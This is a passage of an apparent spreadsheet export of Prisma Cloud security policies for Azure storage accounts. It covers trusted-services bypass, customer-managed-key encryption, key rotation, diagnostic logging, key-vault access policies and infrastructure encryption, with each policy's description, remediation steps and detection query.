      <c r="V2453" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2453" t="inlineStr">
        <is>
          <t>This policy identifies Storage Accounts which have 'Trusted Microsoft Services' access not enabled. Some Microsoft services that interact with storage accounts operate from networks that can't be granted access through network rules. To help this type of service work as intended, allow the set of trusted Microsoft services to bypass the network rules. These services will then use strong authentication to access the storage account. If the Allow trusted Microsoft services exception is enabled, the following services: Azure Backup, Azure Site Recovery, Azure DevTest Labs, Azure Event Grid, Azure Event Hubs, Azure Networking, Azure Monitor and Azure SQL Data Warehouse (when registered in the subscription), are granted access to the storage account. It is recommended to enable Trusted Microsoft Services on storage account instead of leveraging network rules.</t>
        </is>
      </c>
      <c r="X2453" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to Storage Accounts dashboard
3. Select the storage account you need to modify
4. Under 'Security + networking' section, Click on 'Networking'
5. Under 'Firewalls and virtual networks' tab, Ensure that 'Enabled from selected virtual networks and IP addresses' is selected.
6. Under 'Exceptions', Make sure that 'Allow Azure services on the trusted services list to access this storage account' is checked.
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/enable-trusted-microsoft-services-for-storage-account-access</t>
        </is>
      </c>
      <c r="Y2453" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Storage/storageAccounts/*' permission. Successful execution will enable Azure accounts to bypass 'Trusted Microsoft Services'.",
'impact': 'allow the set of trusted Microsoft services to bypass the network rules',
'cliScriptTemplate': 'az storage account update --name $resourceName --resource-group  $resourceGroup --bypass AzureServices'</t>
        </is>
      </c>
      <c r="Z2453" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = 'networkRuleSet.bypass does not contain AzureServices'
{"category":"Networking","resourceTypes":["azurerm_storage_account","azurerm_storage_account_network_rules"]}</t>
        </is>
      </c>
      <c r="AA2453" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2453" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2453" t="inlineStr">
        <is>
          <t>PC-AZR-STO-405-CKV_AZURE_36</t>
        </is>
      </c>
      <c r="AD2453" t="b">
        <v>1</v>
      </c>
      <c r="AE2453" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2453" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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3" t="inlineStr">
        <is>
          <t>3d8d4e24-1336-4bc1-a1f3-15e680edca07</t>
        </is>
      </c>
      <c r="AI2453" t="inlineStr">
        <is>
          <t>04aaadfc-65e0-4347-9a3e-1922e9a2068e</t>
        </is>
      </c>
      <c r="AJ2453" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2453" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2454">
      <c r="A2454" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, NIST 800-53 Rev 5, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, GDPR, Microsoft Cloud Security Benchmark v1, DORA, TX-RAMP Level 2, SOC 2, NIST SP 800-171 Revision 3, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2454" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2454" s="2" t="inlineStr"/>
      <c r="D2454" t="inlineStr"/>
      <c r="E2454" t="inlineStr"/>
      <c r="F2454" t="inlineStr"/>
      <c r="G2454" t="b">
        <v>1</v>
      </c>
      <c r="H24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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2454" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2454" t="inlineStr">
        <is>
          <t>Azure Log analytics linked storage account is not configured with CMK encryption</t>
        </is>
      </c>
      <c r="L2454" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2454" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2454" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2454" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2454" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2454" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2454" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2454" t="inlineStr"/>
      <c r="T2454" t="b">
        <v>0</v>
      </c>
      <c r="U2454" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2454" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2454" t="inlineStr">
        <is>
          <t>This policy identifies Azure Log analytics linked Storage accounts which are not encrypted with CMK. By default Azure Storage account is encrypted using Microsoft Managed Keys. It is recommended to use Customer Managed Keys to encrypt data in Azure Storage accounts linked Log analytics for better control on the data.</t>
        </is>
      </c>
      <c r="X2454" t="inlineStr">
        <is>
          <t>To configure encryption using CMK for existing Azure Log analytics linked storage account, follow below URL:
https://learn.microsoft.com/en-us/azure/azure-monitor/logs/private-storage#customer-managed-key-data-encryption</t>
        </is>
      </c>
      <c r="Y2454" t="inlineStr"/>
      <c r="Z2454" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.encryption.keySource does not equal ignore case "Microsoft.Keyvault" as X; config from cloud.resource where api.name = 'azure-log-analytics-linked-storage-accounts' AND json.rule = properties.dataSourceType equal ignore case Query as Y; filter '$.X.id contains $.Y.properties.storageAccountIds'; show X;</t>
        </is>
      </c>
      <c r="AA2454" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2454" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2454" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1062</t>
        </is>
      </c>
      <c r="AD2454" t="b">
        <v>1</v>
      </c>
      <c r="AE2454" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2454" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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4" t="inlineStr">
        <is>
          <t>2f5e81a5-4e87-45c2-ba15-ed9951727a4b</t>
        </is>
      </c>
      <c r="AI2454" t="inlineStr">
        <is>
          <t>df5b45cd-a053-4929-b242-a54619ee4c79</t>
        </is>
      </c>
      <c r="AJ2454" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2454" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2455">
      <c r="A2455" t="inlineStr">
        <is>
          <t>HIPAA, CIS v1.5.0 (Azure) - Level 2, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS v1.3.1 (Azure), ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, CIS v1.2.0 (Azure), PCI DSS v3.2.1, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, MLPS 2.0 (Level 2), NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 2, TX-RAMP Level 1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), CRI Profile v1.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, MTSBv2_Azure, Copy of New Zealand Information Security Manual (NZISM v3.4), Copy of CIS Controls v8, PCI DSS v4.0, FFIEC, HITRUST v.9.4.2 [Deprecated], CIS v1.4.0 (Azure), SOC 2, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27017:2015, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), TX-RAMP Level 2, PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27018:2019, CRI Profile v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Azure Security Benchmark (v2), Copy of Azure Security Benchmark (v3), ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, Azure Security Benchmark (v3), PCI DSS v4.0, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), PCI DSS v4.0, HIPAA, ISO/IEC 27002:2013, PCI DSS v4.0, ISO/IEC 27002:2013, Azure Security Benchmark (v3), CIS v1.3.0 (Azure), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ITSG-33, ISO/IEC 27002:2013, CRI Profile v2.0, Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (Azure) Level 2, CRI Profile v1.2.1, PCI DSS v4.0, NIST SP 800-171 Revision 2, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B2455" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2455" s="2" t="inlineStr"/>
      <c r="D2455" t="inlineStr"/>
      <c r="E2455" t="inlineStr"/>
      <c r="F2455" t="inlineStr"/>
      <c r="G2455" t="b">
        <v>0</v>
      </c>
      <c r="H24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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2455" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2455" t="inlineStr">
        <is>
          <t>Azure Storage account Encryption Customer Managed Keys Disabled</t>
        </is>
      </c>
      <c r="L2455" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2455" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2455" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2455" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2455" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2455" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R2455" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S2455" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2455" t="b">
        <v>0</v>
      </c>
      <c r="U2455" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2455" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2455" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account which has Encryption with Customer Managed Keys Disabled. By default all data at rest in Azure Storage account is encrypted using Microsoft Managed Keys. It is recommended to use Customer Managed Keys to encrypt data in Azure Storage accounts for better control on Storage account data.</t>
        </is>
      </c>
      <c r="X2455" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to Storage accounts dashboard and Click on reported storage account
3. Under the Settings menu, click on Encryption
4. Select Customer Managed Keys
- Choose 'Enter key URI' and Enter 'Key URI'
OR
- Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key'
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2455" t="inlineStr"/>
      <c r="Z2455" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-storage-account-list' AND json.rule = properties.encryption.keySource equals "Microsoft.Storage"</t>
        </is>
      </c>
      <c r="AA2455" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2455" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2455" t="inlineStr">
        <is>
          <t>PC-AZR-STO-571</t>
        </is>
      </c>
      <c r="AD2455" t="b">
        <v>1</v>
      </c>
      <c r="AE2455" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2455" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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5" t="inlineStr">
        <is>
          <t>6ff0fbd8-cc5d-4123-ab41-3b92473e2517</t>
        </is>
      </c>
      <c r="AI2455" t="inlineStr">
        <is>
          <t>02b53921-7e9e-4e46-951d-550267b395eb</t>
        </is>
      </c>
      <c r="AJ2455" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2455" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2456">
      <c r="A2456" t="inlineStr"/>
      <c r="B2456" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2456" s="2" t="inlineStr"/>
      <c r="D2456" t="inlineStr"/>
      <c r="E2456" t="inlineStr"/>
      <c r="F2456" t="inlineStr"/>
      <c r="G2456" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2456" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2456" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to Azure Storage account encryption key not configured for key rotation</t>
        </is>
      </c>
      <c r="L2456" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,DISCOVERY</t>
        </is>
      </c>
      <c r="M2456" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2456" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2456" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2456" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2456" t="inlineStr"/>
      <c r="R2456" t="inlineStr"/>
      <c r="S2456" t="inlineStr"/>
      <c r="T2456" t="b">
        <v>0</v>
      </c>
      <c r="U2456" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2456" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2456" t="inlineStr">
        <is>
          <t>This policy identifies potential sensitive data exposure risk due to Azure Storage accounts containing sensitive data and encrypted by an encryption key that is not rotated regularly.
Azure Storage account holding sensitive data encrypted by an encryption key that is not rotated regularly could lead to compromise when keys get exposed by any means. Key rotation will make sure keys are rotated at regular intervals so that the compromise surface can be reduced.
Immediate attention is required to enforce key rotation on the encryption key for the reported Storage account as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2456" t="inlineStr">
        <is>
          <t>[MISCONFIGURATION]
To configure Stroage account encryption key rotation; refer below URL:
https://learn.microsoft.com/en-us/azure/storage/common/customer-managed-keys-configure-existing-account?tabs=azure-portal#configure-encryption-for-automatic-updating-of-key-versions
NOTE: Azure Storage checks the key vault for a new key version only once daily. When you rotate a key, be sure to wait 24 hours before disabling the older version.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2456" t="inlineStr"/>
      <c r="Z2456" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-storage-account-list') and finding.name contains all ('Azure Storage account encryption key is not rotated regularly','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2456" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2456" t="inlineStr">
        <is>
          <t>2024-02-02 08:15:33</t>
        </is>
      </c>
      <c r="AC2456" t="inlineStr"/>
      <c r="AD2456" t="b">
        <v>1</v>
      </c>
      <c r="AE2456" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2456" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>7a6808fc-ce94-4bf2-b37d-a2f15a954786</t>
        </is>
      </c>
      <c r="AI2456" t="inlineStr">
        <is>
          <t>4416796e-8f86-48ec-b232-ada0a0457166</t>
        </is>
      </c>
      <c r="AJ2456" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2456" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2457">
      <c r="A2457" t="inlineStr">
        <is>
          <t>CIS v2.0.0 (Azure) Level 2, CIS v2.1.0 (Azure) Level 2, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12</t>
        </is>
      </c>
      <c r="B2457" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2457" s="2" t="inlineStr"/>
      <c r="D2457" t="inlineStr"/>
      <c r="E2457" t="inlineStr"/>
      <c r="F2457" t="inlineStr"/>
      <c r="G2457" t="b">
        <v>1</v>
      </c>
      <c r="H24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57" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2457" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2457" t="inlineStr">
        <is>
          <t>Azure Storage account diagnostic setting for blob is disabled</t>
        </is>
      </c>
      <c r="L2457" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2457" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2457" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2457" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2457" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2457" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2457" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2457" t="inlineStr"/>
      <c r="T2457" t="b">
        <v>0</v>
      </c>
      <c r="U2457" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2457" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2457" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage account blobs that have diagnostic logging disabled.
By enabling diagnostic settings, you can capture various types of activities and events occurring within these storage account blobs. These logs provide valuable insights into the operations, performance, and security of the storage account blobs.
As a best practice, it is recommended to enable diagnostic logs on all storage account blobs.</t>
        </is>
      </c>
      <c r="X2457" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the Storage Accounts dashboard
3. Click on the reported Storage account
4. Under the 'Monitoring' menu, click on 'Diagnostic settings'
5. Select the blob resource
6. Under 'Diagnostic settings', click on 'Add diagnostic setting'
7. At the top, enter the 'Diagnostic setting name'
8. Under 'Logs', select all the checkboxes under 'Categories'
9. Under 'Destination details', select the destination for logging
10. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2457" t="inlineStr"/>
      <c r="Z2457" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.provisioningState equal ignore case Succeeded as X; config from cloud.resource where api.name = 'azure-storage-account-blob-diagnostic-settings' AND json.rule = properties.logs[*].enabled all true as Y; filter 'not($.X.name equal ignore case $.Y.StorageAccountName)'; show X;</t>
        </is>
      </c>
      <c r="AA2457" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2457" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2457" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1281</t>
        </is>
      </c>
      <c r="AD2457" t="b">
        <v>1</v>
      </c>
      <c r="AE2457" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2457" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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57" t="inlineStr">
        <is>
          <t>9a1dcf35-4d49-47b0-80f5-285084f57c1e</t>
        </is>
      </c>
      <c r="AI2457" t="inlineStr">
        <is>
          <t>38e5c221-4f56-4a14-a367-9b53f3e94da0</t>
        </is>
      </c>
      <c r="AJ2457" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2457" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2458">
      <c r="A2458" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, ISO/IEC 27001:2022, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, Microsoft Cloud Security Benchmark v1, DORA, Telecommunications Security Act - TSA, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CRI Profile v2.0, TX-RAMP Level 1, NIST CSF v2.0, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2458" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2458" s="2" t="inlineStr"/>
      <c r="D2458" t="inlineStr"/>
      <c r="E2458" t="inlineStr"/>
      <c r="F2458" t="inlineStr"/>
      <c r="G2458" t="b">
        <v>1</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2458" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2458" t="inlineStr">
        <is>
          <t>Azure Storage account encryption key configured by access policy with privileged operations</t>
        </is>
      </c>
      <c r="L2458" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2458" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2458" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2458" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2458" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2458" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2458" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2458" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2458" t="b">
        <v>0</v>
      </c>
      <c r="U2458" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2458" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2458" t="inlineStr">
        <is>
          <t>This policy identifies Azure Storage accounts which are encrypted by an encryption key configured access policy with privileged operations. Encryption keys should be kept confidential and only accessible to authorized entity with limited operation access. Allowing privileged access to an encryption key also allows to alter/delete the data that is encrypted by it, making the data more easily accessible. It is recommended to have restricted access policies to an encryption key so that only authorized entities can access it with limited operation access.</t>
        </is>
      </c>
      <c r="X2458" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to your Storage account and display the Encryption settings
3. Keep note of the Key vault and Key used
4. Navigate to the Key Vault resource noted
5. Select Access policies, select the key noted
6. Click on Edit and make sure only required permissions are checked instead of Select all and only required operations are selected instead of privileged operations as per business requirement.</t>
        </is>
      </c>
      <c r="Y2458" t="inlineStr"/>
      <c r="Z2458" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-storage-account-list' AND json.rule = properties.encryption.keySource equal ignore case "Microsoft.Keyvault" as X; config from cloud.resource where api.name = 'azure-key-vault-list' and json.rule = properties.enableRbacAuthorization is false and properties.accessPolicies[*].permissions exists and (properties.accessPolicies[*].permissions.keys[*] intersects ('Decrypt', 'Encrypt', 'Release', 'Purge', 'all') or properties.accessPolicies[*].permissions.secrets[*] intersects ('Purge', 'all') or properties.accessPolicies[*].permissions.certificates[*] intersects ('Purge', 'all'))  as Y; filter '$.Y.properties.vaultUri contains $.X.properties.encryption.keyvaultproperties.keyvaulturi'; show X;</t>
        </is>
      </c>
      <c r="AA2458" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2458" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2458" t="inlineStr">
        <is>
          <t>PC-AZR-STO-1082</t>
        </is>
      </c>
      <c r="AD2458" t="b">
        <v>1</v>
      </c>
      <c r="AE2458" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2458" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>7d738f3d-90c9-4af4-859b-fe11038c77d2</t>
        </is>
      </c>
      <c r="AI2458" t="inlineStr">
        <is>
          <t>9f317802-9176-47a4-8c78-be40a2086a04</t>
        </is>
      </c>
      <c r="AJ2458" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2458" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2459">
      <c r="A2459" t="inlineStr">
        <is>
          <t>CIS v2.1.0 (Azure) Level 2, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, SOC 2, CIS v2.0.0 (Azure) Level 2, Microsoft Cloud Security Benchmark v1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2459" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2459" s="2" t="inlineStr"/>
      <c r="D2459" t="inlineStr"/>
      <c r="E2459" t="inlineStr"/>
      <c r="F2459" t="inlineStr"/>
      <c r="G2459" t="b">
        <v>1</v>
      </c>
      <c r="H24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59" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2459" t="inlineStr">
        <is>
          <t>azure-storage-account</t>
        </is>
      </c>
      <c r="K2459" t="inlineStr">
        <is>
          <t>Azure storage account infrastructure encryption is disabled</t>
        </is>
      </c>
      <c r="L2459" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2459" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2459" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2459" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2459" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2459" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2459" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2459" t="inlineStr"/>
      <c r="T2459" t="b">
        <v>0</v>
      </c>
      <c r="U2459" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2459" t="inlineStr">
        <is>
          <t>azure-storage-account-list</t>
        </is>
      </c>
      <c r="W2459" t="inlineStr">
        <is>
          <t>The policy identifies Azure storage accounts for which infrastructure encryption is disabled.
Infrastructure double encryption adds a second layer of encryption using service-managed keys. When infrastructure encryption is enabled for a storage account or an encryption scope, data is encrypted twice. Once at the service level and once at the infrastructure level - with two different encryption algorithms and two different keys. Infrastructure encryption is recommended for scenarios where double encrypted data is necessary for compliance requirements.
It is recommended to enable infrastructure encryption on Azure storage accounts so that encryption can be implemented at the layer closest to the storage device or network wires.</t>
        </is>
      </c>
      <c r="X2459" t="inlineStr">
        <is>
          <t>Configuring Infrastructure double encryption for Azure Storage accounts is only allowed during storage account creation. Once the storage account is provisioned, you cannot change the storage encryption.
To create an Azure Storage account with Infrastructure double encryption, follow the below URL:
